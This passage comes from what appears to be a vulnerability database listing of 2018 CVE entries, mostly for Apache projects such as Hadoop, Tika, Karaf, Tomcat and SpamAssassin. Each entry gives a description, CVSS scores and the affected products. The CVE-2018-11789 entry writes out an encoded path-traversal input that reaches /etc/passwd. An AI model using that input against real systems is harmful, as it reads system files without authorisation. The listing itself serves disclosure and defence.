Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache openoffice 4.1.5
canonical ubuntu_linux 16.04
debian debian_linux 9.0
canonical ubuntu_linux 14.04
debian debian_linux 7.0
redhat enterprise_linux_desktop 7.0
libreoffice libreoffice 6.0.3
redhat enterprise_linux_workstation 7.0
debian debian_linux 8.0
redhat enterprise_linux_server 7.0
CVE-2018-11756 HIGH

In PHP Runtime for Apache OpenWhisk, a Docker action inheriting one of the Docker tags openwhisk/action-php-v7.2:1.0.0 or openwhisk/action-php-v7.1:1.0.1 (or earlier) may allow an attacker to replace the user function inside the container if the user code is vulnerable to code exploitation.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache openwhisk *
CVE-2018-11757 HIGH

In Docker Skeleton Runtime for Apache OpenWhisk, a Docker action inheriting the Docker tag openwhisk/dockerskeleton:1.3.0 (or earlier) may allow an attacker to replace the user function inside the container if the user code is vulnerable to code exploitation.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache openwhisk *
CVE-2018-11758 MEDIUM

This affects Apache Cayenne 4.1.M1, 3.2.M1, 4.0.M2 to 4.0.M5, 4.0.B1, 4.0.B2, 4.0.RC1, 3.1, 3.1.1, 3.1.2. CayenneModeler is a desktop GUI tool shipped with Apache Cayenne and intended for editing Cayenne ORM models stored as XML files. If an attacker tricks a user of CayenneModeler into opening a malicious XML file, the attacker will be able to instruct the XML parser built into CayenneModeler to transfer files from a local machine to a remote machine controlled by the attacker. The cause of the issue is XML parser processing XML External Entity (XXE) declarations included in XML. The vulnerability is addressed in Cayenne by disabling XXE processing in all operations that require XML parsing.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache cayenne 3.1.1
apache cayenne 3.1.2
apache cayenne 4.0
apache cayenne *
apache cayenne 3.2
apache cayenne 4.1
CVE-2018-11759 MEDIUM

The Apache Web Server (httpd) specific code that normalised the requested path before matching it to the URI-worker map in Apache Tomcat JK (mod_jk) Connector 1.2.0 to 1.2.44 did not handle some edge cases correctly. If only a sub-set of the URLs supported by Tomcat were exposed via httpd, then it was possible for a specially constructed request to expose application functionality through the reverse proxy that was not intended for clients accessing the application via the reverse proxy. It was also possible in some configurations for a specially constructed request to bypass the access controls configured in httpd. While there is some overlap between this issue and CVE-2018-1323, they are not identical.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
redhat jboss_core_services -
apache tomcat_jk_connector *
debian debian_linux 9.0
debian debian_linux 8.0
CVE-2018-11760 LOW

When using PySpark, it's possible for a different local user to connect to the Spark application and impersonate the user running the Spark application. This affects versions 1.x, 2.0.x, 2.1.x, 2.2.0 to 2.2.2, and 2.3.0 to 2.3.1.

CVSS 2.0

Severity: LOW

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache spark *
CVE-2018-11761 MEDIUM

In Apache Tika 0.1 to 1.18, the XML parsers were not configured to limit entity expansion. They were therefore vulnerable to an entity expansion vulnerability which can lead to a denial of service attack.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
oracle business_process_management_suite 12.2.1.3.0
apache tika *
oracle business_process_management_suite 12.1.3.0.0
CVE-2018-11762 MEDIUM

In Apache Tika 0.9 to 1.18, in a rare edge case where a user does not specify an extract directory on the commandline (--extract-dir=) and the input file has an embedded file with an absolute path, such as "C:/evil.bat", tika-app would overwrite that file.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache tika *
CVE-2018-11763 MEDIUM

In Apache HTTP Server 2.4.17 to 2.4.34, by sending continuous, large SETTINGS frames a client can occupy a connection, server thread and CPU time without any connection timeout coming to effect. This affects only HTTP/2 connections. A possible mitigation is to not enable the h2 protocol.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
canonical ubuntu_linux 18.04
netapp storage_automation_store -
oracle secure_global_desktop 5.4
oracle instantis_enterprisetrack 17.1
oracle hospitality_guest_access 4.2.1
oracle enterprise_manager_ops_center 12.3.3
redhat enterprise_linux 6.0
redhat enterprise_linux 7.0
redhat enterprise_linux 7.5
redhat enterprise_linux 7.4
oracle retail_xstore_point_of_service 7.1
oracle instantis_enterprisetrack 17.2
oracle hospitality_guest_access 4.2.0
oracle instantis_enterprisetrack 17.3
redhat enterprise_linux 7.6
oracle retail_xstore_point_of_service 7.0
CVE-2018-11764 HIGH

Web endpoint authentication check is broken in Apache Hadoop 3.0.0-alpha4, 3.0.0-beta1, and 3.0.0. Authenticated users may impersonate any user even if no proxy user is configured.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-306,

Products Affected

Vendor Product Version
apache hadoop 3.0.0
CVE-2018-11765 MEDIUM

In Apache Hadoop versions 3.0.0-alpha2 to 3.0.0, 2.9.0 to 2.9.2, 2.8.0 to 2.8.5, any users can access some servlets without authentication when Kerberos authentication is enabled and SPNEGO through HTTP is not enabled.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache hadoop *
apache hadoop 3.0.0
CVE-2018-11766 HIGH

In Apache Hadoop 2.7.4 to 2.7.6, the security fix for CVE-2016-6811 is incomplete. A user who can escalate to yarn user can possibly run arbitrary commands as root user.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache hadoop *
CVE-2018-11767 MEDIUM

In Apache Hadoop 2.9.0 to 2.9.1, 2.8.3 to 2.8.4, 2.7.5 to 2.7.6, the KMS may block users or grant access to users incorrectly if the system uses non-default groups mapping mechanisms.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-269,

Products Affected

Vendor Product Version
apache hadoop *
CVE-2018-11768 MEDIUM

In Apache Hadoop 3.1.0 to 3.1.1, 3.0.0-alpha1 to 3.0.3, 2.9.0 to 2.9.1, and 2.0.0-alpha to 2.8.4, the user/group information can be corrupted across storing in fsimage and reading back from fsimage.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache hadoop 2.0.4
apache hadoop 2.0.5
apache hadoop 2.1.0
apache hadoop 2.0.0
apache hadoop 2.0.6
apache hadoop 2.0.3
apache hadoop 2.1.1
apache hadoop 2.0.2
apache hadoop 2.0.1
apache hadoop *
apache hadoop 3.0.0
CVE-2018-11769 HIGH

CouchDB administrative users before 2.2.0 can configure the database server via HTTP(S). Due to insufficient validation of administrator-supplied configuration settings via the HTTP API, it is possible for a CouchDB administrator user to escalate their privileges to that of the operating system's user under which CouchDB runs, by bypassing the blacklist of configuration settings that are not allowed to be modified via the HTTP API. This privilege escalation effectively allows a CouchDB admin user to gain arbitrary remote code execution, bypassing CVE-2017-12636 and CVE-2018-8007.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache couchdb *
CVE-2018-11770 MEDIUM

From version 1.3.0 onward, Apache Spark's standalone master exposes a REST API for job submission, in addition to the submission mechanism used by spark-submit. In standalone, the config property 'spark.authenticate.secret' establishes a shared secret for authenticating requests to submit jobs via spark-submit. However, the REST API does not use this or any other authentication mechanism, and this is not adequately documented. In this case, a user would be able to run a driver program without authenticating, but not launch executors, using the REST API. This REST API is also used by Mesos, when set up to run in cluster mode (i.e., when also running MesosClusterDispatcher), for job submission. Future versions of Spark will improve documentation on these points, and prohibit setting 'spark.authenticate.secret' when running the REST APIs, to make this clear. Future versions will also disable the REST API by default in the standalone master by changing the default value of 'spark.master.rest.enabled' to 'false'.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache spark *
CVE-2018-11771 MEDIUM

When reading a specially crafted ZIP archive, the read method of Apache Commons Compress 1.7 to 1.17's ZipArchiveInputStream can fail to return the correct EOF indication after the end of the stream has been reached. When combined with a java.io.InputStreamReader this can lead to an infinite stream, which can be used to mount a denial of service attack against services that use Compress' zip package.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
oracle weblogic_server 14.1.1.0.0
apache commons_compress *
CVE-2018-11772 MEDIUM

Apache VCL versions 2.1 through 2.5 do not properly validate cookie input when determining what node (if any) was previously selected in the privilege tree. The cookie data is then used in an SQL statement. This allows for an SQL injection attack. Access to this portion of a VCL system requires admin level rights. Other layers of security seem to protect against malicious attack. However, all VCL systems running versions earlier than 2.5.1 should be upgraded or patched. This vulnerability was found and reported to the Apache VCL project by ADLab of Venustech.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache virtual_computing_lab *
CVE-2018-11773 HIGH

Apache VCL versions 2.1 through 2.5 do not properly validate form input when processing a submitted block allocation. The form data is then used as an argument to the php built in function strtotime. This allows for an attack against the underlying implementation of that function. The implementation of strtotime at the time the issue was discovered appeared to be resistant to a malicious attack. However, all VCL systems running versions earlier than 2.5.1 should be upgraded or patched. This vulnerability was found and reported to the Apache VCL project by ADLab of Venustech.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache virtual_computing_lab *
CVE-2018-11774 MEDIUM

Apache VCL versions 2.1 through 2.5 do not properly validate form input when adding and removing VMs to and from hosts. The form data is then used in SQL statements. This allows for an SQL injection attack. Access to this portion of a VCL system requires admin level rights. Other layers of security seem to protect against malicious attack. However, all VCL systems running versions earlier than 2.5.1 should be upgraded or patched. This vulnerability was found and reported to the Apache VCL project by ADLab of Venustech.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache virtual_computing_lab *
CVE-2018-11775 MEDIUM

TLS hostname verification when using the Apache ActiveMQ Client before 5.15.6 was missing which could make the client vulnerable to a MITM attack between a Java application using the ActiveMQ client and the ActiveMQ server. This is now enabled by default.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
oracle flexcube_private_banking 12.0.3.0
apache activemq *
oracle flexcube_private_banking 2.2.0.1
oracle flexcube_private_banking 12.0.1.0
oracle flexcube_private_banking 2.0.0.0
oracle flexcube_private_banking 12.1.0.0
oracle enterprise_repository 12.1.3.0.0
CVE-2018-11776 HIGH

Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either set by the user or by a plugin like Convention Plugin) and then: results are used with no namespace and, at the same time, their upper package has no namespace or a wildcard namespace; and, similar to results, the same possibility exists when using a url tag which doesn't have value and action set and, at the same time, its upper package has no namespace or a wildcard namespace.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache struts *
netapp active_iq_unified_manager *
oracle enterprise_manager_base_platform 13.4.0.0
netapp oncommand_insight -
oracle mysql_enterprise_monitor *
oracle communications_policy_management *
netapp snapcenter -
netapp oncommand_workflow_automation -
oracle enterprise_manager_base_platform 13.3.0.0
CVE-2018-11777 MEDIUM

In Apache Hive 2.3.3, 3.1.0 and earlier, local resources on HiveServer2 machines are not properly protected against a malicious user if ranger, sentry or the sql standard authorizer is not in use.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache hive *
CVE-2018-11778 MEDIUM

UnixAuthenticationService in Apache Ranger 1.2.0 was updated to correctly handle user input to avoid a stack-based buffer overflow. Versions prior to 1.2.0 should be upgraded to 1.2.0.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-787,

Products Affected

Vendor Product Version
apache ranger *
CVE-2018-11779 HIGH

In Apache Storm versions 1.1.0 to 1.2.2, when the user is using the storm-kafka-client or storm-kafka modules, it is possible to cause the Storm UI daemon to deserialize user provided bytes into a Java class.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache storm *
CVE-2018-11780 HIGH

A potential Remote Code Execution bug exists with the PDFInfo plugin in Apache SpamAssassin before 3.4.2.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-94,

Products Affected

Vendor Product Version
canonical ubuntu_linux 12.04
apache spamassassin *
canonical ubuntu_linux 16.04
canonical ubuntu_linux 18.04
canonical ubuntu_linux 14.04
pdfinfo_project pdfinfo -
debian debian_linux 8.0
CVE-2018-11781 MEDIUM

Apache SpamAssassin 3.4.2 fixes a local user code injection in the meta rule syntax.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-94,

Products Affected

Vendor Product Version
canonical ubuntu_linux 12.04
apache spamassassin *
canonical ubuntu_linux 16.04
canonical ubuntu_linux 18.04
canonical ubuntu_linux 14.04
redhat enterprise_linux_server_eus 7.5
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_workstation 7.0
debian debian_linux 8.0
redhat enterprise_linux_server 7.0
CVE-2018-11782 MEDIUM

In Apache Subversion versions up to and including 1.9.10, 1.10.4, 1.12.0, Subversion's svnserve server process may exit when a well-formed read-only request produces a particular answer. This can lead to disruption for users of the server.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache subversion 1.12.0
apache subversion *
CVE-2018-11783 MEDIUM

sslheaders plugin extracts information from the client certificate and sets headers in the request based on the configuration of the plugin. The plugin doesn't strip the headers from the request in some scenarios. This problem was discovered in versions 6.0.0 to 6.0.3, 7.0.0 to 7.1.5, and 8.0.0 to 8.0.1.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2018-11784 MEDIUM

When the default servlet in Apache Tomcat versions 9.0.0.M1 to 9.0.11, 8.5.0 to 8.5.33 and 7.0.23 to 7.0.90 returned a redirect to a directory (e.g. redirecting to '/foo/' when the user requested '/foo'), a specially crafted URL could be used to cause the redirect to be generated to any URI of the attacker's choice.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-601,

Products Affected

Vendor Product Version
oracle secure_global_desktop 5.4
redhat enterprise_linux_server_tus 7.6
oracle instantis_enterprisetrack 17.1
oracle hospitality_guest_access 4.2.1
apache tomcat *
canonical ubuntu_linux 14.04
oracle communications_application_session_controller 3.7.1
oracle hospitality_guest_access 4.2.0
oracle instantis_enterprisetrack 17.3
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
oracle retail_order_broker 15.0
netapp snap_creator_framework -
redhat enterprise_linux_server 7.6
oracle retail_order_broker 5.1
debian debian_linux 8.0
canonical ubuntu_linux 16.04
apache tomcat 9.0.0
redhat enterprise_linux_server_eus 7.6
oracle instantis_enterprisetrack 17.2
oracle communications_application_session_controller 3.8.0
oracle retail_order_broker 5.2
redhat enterprise_linux_server 7.0
CVE-2018-11785 MEDIUM

Missing authorization check in Apache Impala before 3.0.1 allows a Kerberos-authenticated but unauthorized user to inject random data into a running query, leading to wrong results for a query.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-862,

Products Affected

Vendor Product Version
apache impala *
CVE-2018-11786 HIGH

In Apache Karaf prior to 4.2.0 release, if the sshd service in Karaf is left on so an administrator can manage the running instance, any user with rights to the Karaf console can pivot and read/write any file on the file system to which the Karaf process user has access. This can be locked down a bit by using chroot to change the root directory to protect files outside of the Karaf install directory; it can be further locked down by defining a security manager policy that limits file system access to those directories beneath the Karaf home that are necessary for the system to run. However, this still allows anyone with ssh access to the Karaf process to read and write a large number of files as the Karaf process user.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-269,

Products Affected

Vendor Product Version
apache karaf *
CVE-2018-11787 MEDIUM

In Apache Karaf versions prior to 3.0.9, 4.0.9, 4.1.1, when the webconsole feature is installed in Karaf, it is available at .../system/console and requires authentication to access it. One part of the console is a Gogo shell/console that gives access to the command line console of Karaf via a Web browser, and when navigated to it is available at .../system/console/gogo. Trying to go directly to that URL does require authentication. An optional bundle that some applications use is the Pax Web Extender Whiteboard; it is part of the pax-war feature and perhaps others. When it is installed, the Gogo console becomes available at another URL, .../gogo/, and that URL is not secured, giving access to the Karaf console to unauthenticated users. A mitigation for the issue is to manually stop/uninstall the Gogo plugin bundle that is installed with the webconsole feature, although of course this removes the console from the .../system/console application, not only from the unauthenticated endpoint. One could also stop/uninstall the Pax Web Extender Whiteboard, but other components/applications may require it and so their functionality would be reduced/compromised.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache karaf 4.0.0
apache karaf *
CVE-2018-11788 HIGH

Apache Karaf provides a features deployer, which allows users to "hot deploy" a features XML by dropping the file directly in the deploy folder. The features XML is parsed by the XMLInputFactory class. The Apache Karaf XMLInputFactory class doesn't contain any mitigation code against XXE. This is a potential security risk as a user can inject external XML entities in Apache Karaf versions prior to 4.1.7 or 4.2.2. It has been fixed in the Apache Karaf 4.1.7 and 4.2.2 releases.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache karaf *
apache karaf 4.2.0
CVE-2018-11789 HIGH

When accessing the heron-ui webpage, people can modify the file paths outside of the current container to access any file on the host. An example would be modifying the parameter path= to go to the directory you would like to view, i.e. ..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache heron *
CVE-2018-11790 MEDIUM

When loading a document with Apache Open Office 4.1.5 and earlier whose end-of-line termination is shorter than the one the operating system uses, the defect occurs. In this case OpenOffice runs into an arithmetic overflow in a string length calculation.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-682,

Products Affected

Vendor Product Version
canonical ubuntu_linux 16.04
apache openoffice *
canonical ubuntu_linux 14.04
CVE-2018-11792 HIGH

In Apache Impala before 3.0.1, ALTER TABLE/VIEW RENAME required ALTER on the old table. This may pose a potential security risk: for example, having ALTER on a table and ALL on a particular database allows a user to move the table to the database with ALL, which automatically grants that user the ALL privilege on that table because the privilege is inherited from the database.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-732,

Products Affected

Vendor Product Version
apache impala *
CVE-2018-11793 MEDIUM

When parsing a JSON payload with deeply nested JSON structures, the parser in Apache Mesos versions pre-1.4.x, 1.4.0 to 1.4.2, 1.5.0 to 1.5.1, 1.6.0 to 1.6.1, and 1.7.0 might overflow the stack due to unbounded recursion. A malicious actor can therefore cause a denial of service of Mesos masters rendering the Mesos-controlled cluster inoperable.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache mesos *
apache mesos 1.8.0
apache mesos 1.4.0
CVE-2018-11796 MEDIUM

In Apache Tika 1.19 (CVE-2018-11761), we added an entity expansion limit for XML parsing. However, Tika reuses SAXParsers and calls reset() after each parse, which, for Xerces2 parsers, as per the documentation, removes the user-specified SecurityManager and thus removes entity expansion limits after the first parse. Apache Tika versions from 0.1 to 1.19 are therefore still vulnerable to entity expansions which can lead to a denial of service attack. Users should upgrade to 1.19.1 or later.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache tika *
CVE-2018-11797 MEDIUM

In Apache PDFBox 1.8.0 to 1.8.15 and 2.0.0RC1 to 2.0.11, a carefully crafted PDF file can trigger an extremely long running computation when parsing the page tree.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache pdfbox 2.0
apache pdfbox 2.0.0
fedoraproject fedora 30
oracle retail_xstore_point_of_service 17.0
apache pdfbox *
fedoraproject fedora 29
CVE-2018-11798 MEDIUM

The Apache Thrift Node.js static web server in versions 0.9.2 through 0.11.0 has been determined to contain a security vulnerability in which a remote user has the ability to access files outside the web server's configured docroot path.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-538,

Products Affected

Vendor Product Version
apache thrift *
CVE-2018-11799 MEDIUM

A vulnerability allows a user of Apache Oozie 3.1.3-incubating to 5.0.0 to impersonate other users. The malicious user can construct an XML that results in workflows running under another user's name.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache oozie 3.1.3
apache oozie *
CVE-2018-11800 HIGH

SQL injection vulnerability in Apache Fineract before 1.3.0 allows attackers to execute arbitrary SQL commands via a query on the GroupSummaryCounts related table.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache fineract *
CVE-2018-11801 HIGH

SQL injection vulnerability in Apache Fineract before 1.3.0 allows attackers to execute arbitrary SQL commands via a query on an m_center data related table.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache fineract *
CVE-2018-11802 MEDIUM

In Apache Solr, the cluster can be partitioned into multiple collections and only a subset of nodes actually host any given collection. However, if a node receives a request for a collection it does not host, it proxies the request to a relevant node and serves the request. Solr bypasses all authorization settings for such requests. This affects all Solr versions prior to 7.7 that use the default authorization mechanism of Solr (RuleBasedAuthorizationPlugin).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-863,

Products Affected

Vendor Product Version
apache solr *
CVE-2018-11803 MEDIUM

Subversion's mod_dav_svn Apache HTTPD module versions 1.11.0 and 1.10.0 to 1.10.3 will crash after dereferencing an uninitialized pointer if the client omits the root path in a recursive directory listing operation.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-824,

Products Affected

Vendor Product Version
canonical ubuntu_linux 18.10
apache subversion 1.11.0
apache subversion *
CVE-2018-11804 MEDIUM

Spark's Apache Maven-based build includes a convenience script, 'build/mvn', that downloads and runs a zinc server to speed up compilation. It has been included in release branches since 1.3.x, up to and including master. This server will accept connections from external hosts by default. A specially-crafted request to the zinc server could cause it to reveal information in files readable to the developer account running the build. Note that this issue does not affect end users of Spark, only developers building Spark from source code.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache spark *
CVE-2018-11805 HIGH

In Apache SpamAssassin before 3.4.3, nefarious CF files can be configured to run system commands without any output or errors. With this, exploits can be injected in a number of scenarios. In addition to upgrading to SA 3.4.3, we recommend that users should only use update channels or 3rd party .cf files from trusted places.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.7 MEDIUM CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 0.8 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-78,

Products Affected

Vendor Product Version
apache spamassassin *
debian debian_linux 9.0
debian debian_linux 10.0
debian debian_linux 8.0
CVE-2018-1273 HIGH

Spring Data Commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5, and older unsupported versions, contain a property binder vulnerability caused by improper neutralization of special elements. An unauthenticated remote malicious user (or attacker) can supply specially crafted request parameters against Spring Data REST backed HTTP resources or using Spring Data's projection-based request payload binding that can lead to a remote code execution attack.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-94,NVD-CWE-Other,

Products Affected

Vendor Product Version
apache ignite *
pivotal_software spring_data_commons *
oracle financial_services_crime_and_compliance_management_studio 8.0.8.2.0
pivotal_software spring_data_rest *
oracle financial_services_crime_and_compliance_management_studio 8.0.8.3.0
apache ignite 1.0.0
CVE-2018-1281 MEDIUM

The clustered setup of Apache MXNet allows users to specify which IP address and port the scheduler will listen on via the DMLC_PS_ROOT_URI and DMLC_PS_ROOT_PORT env variables. In versions older than 1.0.0, however, the MXNet framework will listen on 0.0.0.0 rather than user specified DMLC_PS_ROOT_URI once a scheduler node is initialized. This exposes the instance running MXNet to any attackers reachable via the interface they didn't expect to be listening on. For example: If a user wants to run a clustered setup locally, they may specify to run on 127.0.0.1. But since MXNet will listen on 0.0.0.0, it makes the port accessible on all network interfaces.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache mxnet *
CVE-2018-1282 HIGH

This vulnerability in Apache Hive JDBC driver 0.7.1 to 2.3.2 allows carefully crafted arguments to be used to bypass the argument escaping/cleanup that the JDBC driver does in its PreparedStatement implementation.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache hive *
CVE-2018-1283 LOW

In Apache httpd 2.4.0 to 2.4.29, when mod_session is configured to forward its session data to CGI applications (SessionEnv on, not the default), a remote user may influence their content by using a "Session" header. This comes from the "HTTP_SESSION" variable name used by mod_session to forward its data to CGIs, since the prefix "HTTP_" is also used by the Apache HTTP Server to pass HTTP header fields, per CGI specifications.

CVSS 2.0

Severity: LOW

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
canonical ubuntu_linux 18.04
netapp storage_automation_store -
debian debian_linux 9.0
netapp santricity_cloud_connector -
netapp clustered_data_ontap -
debian debian_linux 8.0
canonical ubuntu_linux 17.10
redhat enterprise_linux 6.0
redhat enterprise_linux 7.0
redhat enterprise_linux 7.5
canonical ubuntu_linux 16.04
redhat enterprise_linux 7.4
canonical ubuntu_linux 14.04
redhat enterprise_linux 7.6
netapp storagegrid -
CVE-2018-1284 MEDIUM

In Apache Hive 0.6.0 to 2.3.2, a malicious user might use any of the xpath UDFs (xpath/xpath_string/xpath_boolean/xpath_number/xpath_double/xpath_float/xpath_long/xpath_int/xpath_short) to expose the content of a file on the machine running HiveServer2 that is owned by the HiveServer2 user (usually hive) if hive.server2.enable.doAs=false.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache hive *
CVE-2018-1285 HIGH

Apache log4net versions before 2.0.10 do not disable XML external entities when parsing log4net configuration files. This allows for XXE-based attacks in applications that accept attacker-controlled log4net configuration files.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
fedoraproject fedora 32
oracle application_testing_suite 13.3.0.1
fedoraproject fedora 31
oracle hospitality_simphony 19.1.3
apache log4net *
fedoraproject fedora 30
netapp manageability_software_development_kit -
netapp snapcenter -
oracle hospitality_opera_5 5.6
oracle hospitality_simphony 18.2.7.2
oracle hospitality_opera_5 5.5
CVE-2018-1286 MEDIUM

In Apache OpenMeetings 3.0.0 - 4.0.1, CRUD operations on privileged users are not password protected allowing an authenticated attacker to deny service for privileged users.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache openmeetings *
CVE-2018-1287 HIGH

In Apache JMeter 2.X and 3.X, when using Distributed Test only (RMI based), the jmeter server binds the RMI Registry to the wildcard host. This could allow an attacker to get access to JMeterEngine and send unauthorized code.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache jmeter 2.4
apache jmeter 2.5
apache jmeter 2.11
apache jmeter 2.3.3
apache jmeter 2.5.1
apache jmeter 3.2
apache jmeter 2.10
apache jmeter 2.3.2
apache jmeter 2.1
apache jmeter 2.13
apache jmeter 2.7
apache jmeter 2.6
apache jmeter 3.0
apache jmeter 3.3
apache jmeter 2.3
apache jmeter 2.2
apache jmeter 2.9
apache jmeter 3.1
apache jmeter 2.12
apache jmeter 2.3.1
apache jmeter 2.8
apache jmeter 2.3.4
CVE-2018-1288 MEDIUM

In Apache Kafka 0.9.0.0 to 0.9.0.1, 0.10.0.0 to 0.10.2.1, 0.11.0.0 to 0.11.0.2, and 1.0.0, authenticated Kafka users may perform actions reserved for the Broker via a manually created fetch request, interfering with data replication and resulting in data loss.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L 2.8 2.5

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

